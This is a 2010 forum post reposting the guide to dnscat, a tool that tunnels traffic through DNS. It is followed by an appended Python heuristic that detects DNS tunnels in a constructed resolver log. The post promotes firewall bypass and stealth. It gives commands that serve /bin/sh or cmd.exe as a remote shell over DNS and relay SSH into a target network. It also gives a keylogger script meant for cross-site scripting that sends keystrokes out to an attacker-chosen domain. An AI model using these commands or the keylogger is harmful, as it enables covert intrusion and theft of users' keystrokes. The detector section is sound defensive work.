begood, Posted March 19, 2010 (edited)

Intro

dnscat is designed in the spirit of netcat, allowing two hosts over the Internet to talk to each other. The major difference between dnscat and netcat, however, is that dnscat routes all traffic through the local (or a chosen) DNS server. This has several major advantages:

* Bypasses pretty much all network firewalls
* Bypasses many local firewalls
* Doesn't pass through the typical gateway/proxy and therefore is stealthy

There are a lot of advantages to using the DNS protocol. There are, of course, several disadvantages as well:

* Data has to be encoded into alpha-numeric (DNS allows letters (not case sensitive) and numbers)
* DNS is slow -- it's not a direct connection
* The possibility of annoying DNS providers with the amount of traffic being sent through them
* dnscat requires the listener to be an authoritative DNS server

The last point is very important. To actually receive DNS traffic, you require either:

1. An authoritative nameserver, preferably one that isn't being used for anything else. This is what I'll be assuming for the rest of the documentation (see the next section for far more information)
2. The ability to connect to the dnscat server on udp/53 from the client (use the --dns flag to set the address) -- this is far less interesting, but will be faster if it works

One of the key netcat-like components of dnscat is the -e (or --exec) argument, which runs a program (such as /bin/sh or cmd.exe) and redirects its input and output through the connection. The --exec flag can be used on the client or server.

dnscat has been tested on, in alphabetical order:

* FreeBSD 7.2
* FreeBSD 8.0
* FreeBSD 8.0 amd64
* Mac OS X 10.4 (I think)
* Slackware 13
* Slackware 13-64
* Windows 2000
* Windows 2003
* Windows XP

It should work on any modern version of Linux, FreeBSD, or Windows.
To start a dnscat server, use the following command line:

    dnscat --listen

To start a dnscat client, use this command line:

    dnscat --domain <domain>

For example:

    dnscat --domain skullseclabs.org

You can also specify the DNS server to use, if the correct one wasn't chosen, by using the --dns argument, or if you don't have an authoritative nameserver and you want to make a direct UDP/53 connection:

    dnscat --domain skullseclabs.org --dns 4.2.2.1

Remember that the server has to be the authoritative nameserver for the domain given by the client, unless the --dns entry points directly to the dnscat server.

For more options, use --help:

    dnscat --help

Remote shell

Typically, to tunnel a shell over DNS, you're going to want to run a standard server as before:

    dnscat --listen

And run the shell on the client side:

Linux/BSD:

    dnscat --domain skullseclabs.org --exec "/bin/sh"

Windows:

    dnscat.exe --domain skullseclabs.org --exec "cmd.exe"

On the server, you can now type commands and they'll run on the client side.

Transfer a file

You can transfer a file to the client from the server like this:

Server:

    dnscat --listen > file.out

Client:

    dnscat --domain <domain> < file.in

You can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:

Server:

    dnscat --listen < file.in

Client:

    dnscat --domain <domain> > file.out

A couple of things to note:

* No integrity checking is performed
* There is currently no indication when a transfer is finished

Tunnel another connection

This is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.

Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100.
The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.

A diagram might help:

    ssh client
       |
       | (port 1234 via netcat)
       |
       v
    dnscat server
       ^
       |
       | (DNS server(s))
       |
    dnscat client
       |
       | (port 22 via netcat)
       |
       v
    ssh server

It's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud.

First, we start the netcat server. The server is going to run netcat, which listens on port 1234:

    dnscat --listen --exec "nc -l -p 1234"

If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.

Second, on the client side, dnscat connects to 192.168.2.100 port 22:

    dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"

This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.

Third and finally, we ssh to our socket:

    ssh -p 1234 ron@127.0.0.1

One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!

Web keylogger

There is an implementation of dnscat in Javascript (jsdnscat) written by Stefan Penner. It's located in the 'samples' folder of nbtool and consists of two libraries, one for keylogging and the other for dnscat.
There are several example HTML files for using these, but it really comes down to these lines:

    <script type='text/javascript' src='js/skullsecurity.all.min.js'></script>
    <script type='text/javascript'>
      SkullSecurity.jsdnscat.config.host = 'yourdomain.com';
      SkullSecurity.keylogger.start(SkullSecurity.jsdnscat.send);
    </script>

Equivalent code can easily be put into a .js file and hosted on your server for easy use with cross-site scripting.

The best reason for using this as opposed to traditional avenues for data exfiltration is to get around logging and firewalls -- because dnscat will respond with a localhost record to all A and AAAA requests, the computer doesn't actually send an HTTP request to the network, yet you still get its data.

Dnscat - Skull Security
download : Dnscat - Skull Security
jsdnscat : http://svn.skullsecurity.org:81/ron/security/nbtool-0.04/samples/jsdnscat/

Edited March 19, 2010 by begood
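The post makes two observations that matter as much to a defender as to a user: the payload has to be encoded into alphanumeric DNS labels, and every chunk of data becomes a fresh query for a distinct name under one domain. Those are exactly the properties a resolver-log review can key on. The following is an added example, not code from dnscat, nbtool or the post: it groups queries by registered domain and flags domains whose leftmost labels are numerous, almost never repeated, long, and high-entropy. The log format, the sample lines and the tunnel-example.org domain are constructed for the demonstration; treating the last two labels as the registered domain is a simplification (a real deployment would use a public-suffix list).

```python
"""Heuristic DNS-tunnel detector over a constructed resolver log.

Added example (not part of dnscat or the original post). Each log line is
assumed to look like:  <timestamp> <client_ip> <qtype> <qname>
"""
import math
from collections import defaultdict

# Constructed sample, not real traffic. example.com is ordinary browsing,
# ntp-example.net is a busy but repetitive name, tunnel-example.org shows the
# tunnel pattern: many distinct, long, alphanumeric leftmost labels.
SAMPLE_LOG = """\
2010-03-19T10:00:01 10.0.0.5 A www.example.com
2010-03-19T10:00:02 10.0.0.5 AAAA mail.example.com
2010-03-19T10:00:03 10.0.0.5 A cdn.example.com
2010-03-19T10:00:04 10.0.0.9 A time.ntp-example.net
2010-03-19T10:00:05 10.0.0.9 A time.ntp-example.net
2010-03-19T10:00:06 10.0.0.9 A time.ntp-example.net
2010-03-19T10:00:07 10.0.0.9 A time.ntp-example.net
2010-03-19T10:00:08 10.0.0.9 A time.ntp-example.net
2010-03-19T10:00:09 10.0.0.9 A time.ntp-example.net
2010-03-19T10:00:10 10.0.0.7 A a7k2m9q4x1z8c3v6b5n0pw.tunnel-example.org
2010-03-19T10:00:10 10.0.0.7 A q1w2e3r4t5y6u7i8o9p0as.tunnel-example.org
2010-03-19T10:00:11 10.0.0.7 A zx9cv8bn7mk6lj5hg4fd3s.tunnel-example.org
2010-03-19T10:00:11 10.0.0.7 A 1q2w3e4r5t6y7u8i9o0pzx.tunnel-example.org
2010-03-19T10:00:12 10.0.0.7 A mn0bv9cx8zl7kj6hg5fd4s.tunnel-example.org
2010-03-19T10:00:12 10.0.0.7 A p0o9i8u7y6t5r4e3w2q1lk.tunnel-example.org
"""


def _labels(qname):
    return qname.rstrip(".").lower().split(".")


def registered_domain(qname):
    # Assumption: the registered domain is the last two labels. Real logs need
    # a public-suffix list (co.uk and friends have three).
    return ".".join(_labels(qname)[-2:])


def leftmost_label(qname):
    # The label that carries tunnelled data; empty when the query is for the
    # bare registered domain.
    labels = _labels(qname)
    return labels[0] if len(labels) > 2 else ""


def shannon_entropy(s):
    # Bits per character; encoded payload looks close to uniform, hostnames do not.
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed or blank lines
        ts, client, qtype, qname = parts
        records.append((ts, client, qtype.upper(), qname.lower()))
    return records


def domain_stats(records):
    acc = defaultdict(lambda: {"n": 0, "names": set(), "len": 0.0, "ent": 0.0})
    for _, _, _, qname in records:
        s = acc[registered_domain(qname)]
        label = leftmost_label(qname)
        s["n"] += 1
        s["names"].add(qname)
        s["len"] += len(label)
        s["ent"] += shannon_entropy(label)
    return {
        d: {
            "queries": s["n"],
            "unique_ratio": len(s["names"]) / s["n"],
            "mean_label_len": s["len"] / s["n"],
            "mean_entropy": s["ent"] / s["n"],
        }
        for d, s in acc.items()
    }


def flag_tunnel_candidates(text, min_queries=5, min_unique_ratio=0.8,
                           min_label_len=20, min_entropy=3.0):
    # All four conditions must hold: volume alone (ntp-example.net) or a few
    # odd names (example.com) are not enough on their own.
    flagged = []
    for d, st in sorted(domain_stats(parse_log(text)).items()):
        if (st["queries"] >= min_queries
                and st["unique_ratio"] >= min_unique_ratio
                and st["mean_label_len"] >= min_label_len
                and st["mean_entropy"] >= min_entropy):
            flagged.append(d)
    return flagged


if __name__ == "__main__":
    for d, st in domain_stats(parse_log(SAMPLE_LOG)).items():
        print(d, st)
    print("tunnel candidates:", flag_tunnel_candidates(SAMPLE_LOG))
```

The thresholds are starting points, not rules: a CDN or anti-virus update service can also generate many distinct labels, so the unique-name ratio and label entropy are what separate encoded payload from busy-but-legitimate names. Because dnscat answers A/AAAA lookups with a localhost record, a complementary check is to alert on domains whose answers are overwhelmingly 127.0.0.1 or ::1, which the post itself describes as the server's behaviour.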